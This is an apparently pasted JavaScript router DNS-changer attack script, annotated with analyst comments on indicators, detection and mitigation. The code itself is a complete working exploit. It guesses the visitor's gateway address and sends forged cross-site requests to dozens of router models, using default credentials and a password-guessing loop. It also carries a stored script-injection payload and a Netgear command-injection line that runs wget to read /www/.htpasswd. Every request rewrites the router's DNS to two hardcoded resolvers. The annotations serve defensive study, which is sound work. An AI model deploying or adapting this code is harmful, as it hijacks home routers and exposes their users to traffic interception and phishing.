hackernix

varpasslist

Mar 20th, 2019
  // Analyst note: configuration for a browser-delivered router DNS-changer script.
  // pDNS / sDNS are the resolver addresses the functions below try to write into a
  // router's DNS settings. Treat both values as indicators of compromise when they
  // show up in a router's WAN/DHCP DNS fields.
  1. var pDNS = "200.98.30.219";
  2. var sDNS = "155.133.82.21";
  // Password candidates that srq() pairs with the user name "admin".
  // "<eopl>" is a marker string that exp() searches for in the request URL.
  3. var passlist=["pass","root","admin","123456789","123456","password","","<eopl>"];
  // Delays in milliseconds before exp() calls window.stop():
  // gstp after a GET whose URL contains the marker, pstp after a form submit.
  4. var gstp=400;
  5. var pstp=5000;
  // exp(url, data, method): issues one cross-site request to `url` from the visitor's browser.
  //   method == "GET": writes a <style> element whose @import targets the URL, with a random
  //     `ju` parameter appended, so the browser fetches it as a stylesheet.
  //   any other method: creates a 1px iframe, builds a form from the "k=v&k=v" string in
  //     `data`, and submits it to `url` with the given method.
  // Neither branch reads the response, so these are blind forged requests (CSRF).
  // Defensive relevance: a device web UI that demands a per-session anti-CSRF token, or that
  // rejects state-changing requests arriving with a foreign Origin/Referer, should not be
  // altered by requests of this shape.
  6. function exp(url, data, method){
  7. if(method=="GET"){
  8. document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>');
  // When the URL contains the "<eopl>" marker, page loading is halted after gstp ms.
  9. if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);}
  10. }
  11. else{
  12. document.write("<body></body>");
  13. var ifrm = document.createElement("IFRAME");
  14. ifrm.height="1px";
  15. ifrm.width="1px";
  16. document.body.appendChild(ifrm);
  17.  
  18. var f=ifrm.contentWindow.document.createElement("FORM");
  19. f.name='f';
  20. f.method=method;
  21. f.action=url;
  // One text input per "name=value" pair of `data`.
  22. var el=data.split('&');
  23. for(i=0;i<el.length;i++)
  24. {
  25. var e=el[i].split('=');
  26. var t=ifrm.contentWindow.document.createElement('INPUT');
  27. t.type='TEXT';
  28. t.id=e[0];
  29. t.name=e[0];
  30. t.value=e[1];
  31. f.appendChild(t);
  32. }
  33. ifrm.contentWindow.document.body.appendChild(f);
  34. f.submit();
  // Page loading is halted pstp ms after the form is submitted.
  35. var tm=setTimeout(function(){window.stop();},pstp);
  36. }
  37. }
  // srq(ip): credential guessing against one router web UI through the visitor's browser.
  // Each iteration builds a GET to /userRpm/WanDynamicIpCfgRpm.htm (the URL names the host
  // TL-WR941ND) that sets dnsserver/dnsserver2 to pDNS/sDNS, with "admin" plus a passlist
  // entry placed in the URL's userinfo part, and sends it via exp().
  // Detection: a burst of browser-originated requests to the LAN gateway that carry
  // `user:password@` in the URL; router access logs with repeated failed logins for "admin".
  // Mitigation: a non-default administrator password on the router.
  38. function srq(ip) {
  39. for(i=0;i<12;i++){
  40.  
  41. var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save";
  42. var method = "GET";
  43. url = url1.replace("$1$","");
  44. var cred="admin";
  45. if(passlist[i]!="")
  46. cred=cred+":"+passlist[i];
  47. cred = cred+"@";
  // "$1$" is the placeholder for the userinfo part; this assignment replaces the
  // credential-free URL built above.
  48. url = url1.replace("$1$",cred);
  49. exp(url, "", method);
  50. }
  51.  
  52. }
  // e_belkin(ip): two requests to a web UI under /cgi-bin/ (the function name suggests
  // Belkin devices; the page does not confirm a model).
  //   1. GET  /cgi-bin/login.exe?pws=admin   - login attempt with the password "admin".
  //   2. POST /cgi-bin/setup_dns.exe         - DNS form with pDNS/sDNS split into octets
  //      and auto_from_isp=0.
  // Detection: these two paths requested back to back on the gateway by a browser that is
  // displaying an unrelated page.
  53. function e_belkin(ip)
  54. {
  55. var method = "POST";
  56. var url = "";
  57. var data ="";
  58.  
  59. url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
  60. exp(url, "", "GET");
  61.  
  62. url="http://"+ip+"/cgi-bin/setup_dns.exe";
  63. data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
  64. exp(url, data, method);
  65. }
  66.  
  // e_webcam(ip): empty stub. It is called from p_exp() but performs no request in this sample.
  67. function e_webcam(ip)
  68. {
  69. }
  70.  
  // p_exp(ip): the POST stage. Calls e_belkin() and e_webcam(), then submits five forms via
  // exp() to different router endpoints on `ip`: /apply.cgi (twice, with admin:admin in the
  // URL), /goform/AdvSetDns, /login.cgi (admin with an empty password) and /h_wan_fix.cgi.
  // Every form that carries DNS fields sets them to pDNS/sDNS.
  // Defensive relevance: the requests depend on default or empty administrator credentials
  // and on endpoints that accept a cross-site form post; changing the default password and
  // keeping router firmware current are the mitigations that apply here.
  71. function p_exp(ip) {
  72. e_belkin(ip);
  73. e_webcam(ip);
  74.  
  75. var method = "POST";
  76. var url = "";
  77. var data ="";
  78.  
  79. url = "http://admin:admin@"+ip+"/apply.cgi";
  80. data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8";
  81. exp(url, data, method);
  82.  
  83. url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm";
  84. data="submit_flag=ether&ether_dnsaddr1="+pDNS+"&ether_dnsaddr2="+sDNS+"&ether_dnsaddr3=8.8.8.8&Apply=Apply";
  85. exp(url, data, method);
  86.  
  87. url="http://"+ip+"/goform/AdvSetDns";
  88. data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS;
  89. exp(url, data, method); /*Unicorn WB-3300NR*/
  90.  
  // Login form posted with user "admin" and an empty password, followed by the DNS form.
  91. url="http://"+ip+"/login.cgi";
  92. data="login_name=admin&login_pass=";
  93. exp(url, data, method);
  94.  
  95. url="http://"+ip+"/h_wan_fix.cgi";
  96. data="static_dns1="+pDNS+"&static_dns2="+sDNS;
  97. exp(url, data, method);
  98.  
  99. }
  100.  
  // e_moto(ip): variant labelled "Motorola" by the author. The first half is commented out.
  // The live code appends two <img> elements to the page and uses their src attributes to
  // make the browser request:
  //   i1 - /frames.asp with userId=admin&password=motorola (a default-credential login);
  //   i2 - /goformFOO/AlFrame with a URL-encoded script fragment in the
  //        Gateway.VirtualServerAdvConfig.serverId.entry parameter. It appears intended to
  //        be stored and later rendered by the device's own UI (script injection) - confirm
  //        against the device before relying on this reading. Only pDNS is inserted.
  // Detection: image requests to the gateway whose query string contains encoded script
  // text or the Gateway.Wan.dnsAddress1 field.
  101. function e_moto(ip)
  102. {
  103. /*var method = "GET";
  104. var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola";
  105. exp(url, "", method);
  106.  
  107. url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply';
  108. exp(url, "", POST); */
  109. var i1 = document.createElement('IMG');
  110. document.body.appendChild(i1);
  111. var i2 = document.createElement('IMG');
  112. document.body.appendChild(i2);
  113. i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';
  114. i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27';
  115.  
  116. }/*Motorola*/
  117.  
  // r_exp(ip): entry point of the sample. Sends a long series of GET requests via exp() to
  // the address `ip`, each shaped for a different router web UI (the author's trailing
  // comments name some models). Every request tries to set the device's DNS servers to
  // pDNS/sDNS, most with a default credential pair (admin:admin, admin:password,
  // Admin:1234, user:user, root:root) embedded in the URL. It then schedules p_exp() after
  // one second and calls srq() and e_moto().
  // Defensive relevance: the requests originate from a browser inside the LAN, so they never
  // cross the perimeter firewall. What applies is a non-default router password, current
  // firmware, and a management UI that is not reachable without a CSRF token.
  // Detection: browser traffic to the gateway with `user:pass@` userinfo or DNS-setting
  // parameters; router DNS fields equal to the values of pDNS/sDNS; clients suddenly
  // resolving through those two addresses.
  118. function r_exp(ip) {
  119.  
  120. var method = "GET";
  121. var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random();
  122. //exp(url, "", method);
  123.  
  // Unlike the rest, this request passes a command line through setup.cgi's
  // `todo=syscmd&cmd=` parameters: the command text reads /www/.htpasswd and posts the DNS
  // settings with wget. Devices that expose this handler need a firmware fix or replacement;
  // a strong password alone does not address it.
  124. url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1&curpath=/&currentsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/&currentsetting.htm=1";
  125. exp(url, "", method); /*DGN 1000/DGN2200*/
  126.  
  127. url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0";
  128. exp(url, "", method); /*asus rt n66u*/
  129.  
  130. url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U&current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1";
  131. exp(url, "", method); /*asus rt n56u*/
  132.  
  133. url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS;
  134. exp(url, "", method); /*asus rt n56u*/
  135.  
  136. url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS;
  137. exp(url, "", method);/*asus nt-12*/
  138.  
  139. url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+"";
  140. exp(url, "", method);
  141.  
  142. url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  143. exp(url, "", method);
  144.  
  145. url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  146. exp(url, "", method); /*Philips*/
  147.  
  148. url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  149. exp(url, "", method);/*Motorola SBG901*/
  150.  
  151. url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP"
  152. exp(url, "", method);
  153.  
  154. url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS;
  155. exp(url, "", method);
  156.  
  157. url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500";
  158. exp(url, "", method);
  159.  
  160. url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  161. exp(url, "", method);
  162.  
  163. url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  164. exp(url, "", method);
  165.  
  166. url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  167. exp(url, "", method);
  168.  
  169. url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  170. exp(url, "", method);
  171.  
  172. url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  173. exp(url, "", method);
  174.  
  175. url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  176. exp(url, "", method);
  177.  
  // The next two requests target DHCP-server settings, i.e. the DNS servers the router
  // hands out to LAN clients, rather than the router's own WAN resolver.
  178. url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+";
  179. exp(url, "", method);
  180.  
  181. url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6";
  182. exp(url, "", method);
  183.  
  184. url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en";
  185. exp(url, "", method);
  186.  
  187. url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save";
  188. exp(url, "", method);
  189.  
  190. url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced";
  191. exp(url, "", method);
  192.  
  193. url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+"";
  194. exp(url, "", method);
  195.  
  196. url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+"";
  197. exp(url, "", method);
  198.  
  199. url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS;
  200. exp(url, "", method);
  201.  
  202. url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS
  203. exp(url, "", method);
  204.  
  205. url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc";
  206. exp(url, "", method); /*DI 604*/
  207.  
  208.  
  // Hand-off to the other stages: the POST stage after 1000 ms, then the password-guessing
  // loop and the Motorola-labelled variant immediately.
  209. var t=setTimeout(function(){p_exp(ip);},1000);
  210. srq(ip);
  211. e_moto(ip);
  212. }
  // Start-up code.
  // is_chrome holds the index of "chrome" in the lower-cased user agent (-1 when absent);
  // its only use visible here is the commented-out redirect on the next line.
  213. var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome');
  214. //if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")};
  215.  
  // runweb() is not defined on this page. It is handed a callback that receives an address
  // string - presumably the visitor's own LAN IP supplied by a separate loader; confirm
  // against the script that defines it. The callback keeps the first three octets, replaces
  // the last with 1 as a guess at the gateway address, and starts r_exp() against it. The
  // private-range filter and the gateway allow-list are commented out in this sample.
  // Defensive relevance: any gateway reachable at x.x.x.1 of the client's subnet is in scope,
  // so the exposure is the router's web UI itself, not a particular address plan.
  216. runweb(function(ip) {
  217. //if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
  218. //var gw = ["192.168.1.1","192.168.15.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"];
  219. var sip = ip.split(".");
  220.  
  221. ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1";
  222. //var i = 0;
  223. //var j = 0;
  224. //for (i = 0; i < gw.length; i++) {
  225. // if (ip == gw[i]) {
  226. // j = j + 1;
  227. // break;
  228. // }
  229. //};
  230. //i = i + 1;
  231. //if (j > 0) {
  232. r_exp(ip);
  233. //};
  234. //}
  235. });